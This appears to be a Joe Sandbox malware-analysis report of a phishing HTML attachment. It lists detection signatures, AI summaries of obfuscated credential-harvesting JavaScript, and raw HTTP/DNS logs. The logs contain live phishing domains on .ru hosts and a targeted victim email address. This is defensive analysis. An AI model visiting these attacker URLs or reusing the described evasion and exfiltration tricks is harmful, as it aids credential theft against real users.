Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NieuwBetalingsbevestigingvoor vanas.eu.htm

Overview

General Information

Sample name:NieuwBetalingsbevestigingvoor vanas.eu.htm
Analysis ID:1578182
MD5:45a162fc517caa6131a9a915d2a424b5
SHA1:5880fd63e013cddd2470d955b94389d10c845fc2
SHA256:0857ad6995b329860bb6f4347efe09527f3289d906cc041501458782b4f78238
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
Yara detected HtmlPhish54
AI detected suspicious Javascript
HTML IFrame injector detected
HTML Script injector detected
HTML file submission containing password form
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\NieuwBetalingsbevestigingvoor vanas.eu.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1896,i,10602721750565109592,8126371862419672758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.4.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru/rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJIAvira URL Cloud: Label: malware

    Phishing

    barindex
    Source: Yara matchFile source: 1.4.pages.csv, type: HTML
    Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tt6l.xentore.ru/eH4dlw0/#ZW5naW5lZXJpbmdAd... This script demonstrates several high-risk behaviors, including detecting browser automation tools, disabling common keyboard shortcuts, and using a debugger trap to redirect the user to a suspicious domain. These behaviors indicate a high likelihood of malicious intent, potentially to prevent analysis or user interaction.
    Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tt6l.xentore.ru/eH4dlw0/#ZW5naW5lZXJpbmdAd... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality, the overall risk level is elevated due to the presence of multiple suspicious indicators.
    Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/NieuwBetalingsbevest... This script demonstrates several high-risk behaviors, including dynamic code execution using the `Function` constructor, data exfiltration by sending sensitive information to external servers, and the use of obfuscated code and URLs. These behaviors are indicative of a highly suspicious and potentially malicious script, warranting a high-risk score.
    Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tt6l.xentore.ru/eH4dlw0/#ZW5naW5lZXJpbmdAd... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a potentially malicious domain upon certain conditions. These behaviors are highly indicative of a malicious script, likely used for phishing or other malicious purposes.
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: New IFrame, src: https://Tt6l.xentore.ru/eH4dlw0/#ZW5naW5lZXJpbmdAdmFuYXMuZXU=
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: New script, src: https://code.jquery.com/jquery-3.6.0.min.js
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: New script tag found
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: Number of links: 0
    Source: NieuwBetalingsbevestigingvoor vanas.eu.htmHTTP Parser: Base64 decoded: engineering@vanas.eu
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: Title: Redirecting does not match URL
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: Has password / email / username input fields
    Source: NieuwBetalingsbevestigingvoor vanas.eu.htmHTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: No favicon
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/NieuwBetalingsbevestigingvoor%20vanas.eu.htm#ZW5naW5lZXJpbmdAdmFuYXMuZXU=HTTP Parser: No <meta name="copyright".. found
    Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 104.21.32.251 104.21.32.251
    Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.146
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.146
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.146
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.177.146
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /eH4dlw0/ HTTP/1.1Host: tt6l.xentore.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tt6l.xentore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tt6l.xentore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tt6l.xentore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tt6l.xentore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://tt6l.xentore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f46c9ee5ddec342&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f46c9ee5ddec342&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f46c9ee5ddec342/1734604981423/a5a29d9b2856db968f9f890dd33a75bcd59170870ad9f80b9391466e460beb8e/nVUMjn0PcCLbXFv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f46c9ee5ddec342/1734604981425/pRF8XJBISw1z0s_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f46c9ee5ddec342/1734604981425/pRF8XJBISw1z0s_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJI HTTP/1.1Host: bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://tt6l.xentore.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://tt6l.xentore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJI HTTP/1.1Host: bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://login.microsoftonline.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: tt6l.xentore.ru
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru
    Source: global trafficDNS traffic detected: DNS query: word.office.com
    Source: global trafficDNS traffic detected: DNS query: www.microsoft365.com
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3215sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWvsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8b8uu/0x4AAAAAAA1vkTuRch78Npt4/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 10:43:03 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: yZhjf/uy85LLHp1Q4sXic+7xJKoU4ceqe0A=$hnHZXiHHjwDzFU79cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f46ca1c5e807d11-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 10:43:11 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 6p6hHQa6TUjt4UxzOxFBhyyy1xKj+7yqMF0=$czdvQNhZL58RYm1Tcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f46ca4bce704263-EWRalt-svc: h3=":443"; ma=86400
